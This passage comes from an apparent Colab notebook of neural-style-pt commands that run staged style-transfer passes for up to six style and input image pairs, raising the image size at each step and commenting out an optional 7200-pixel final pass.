!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 2 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/2A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 3 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/3A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 4 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/4A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 5 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/5A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 6 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/6A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
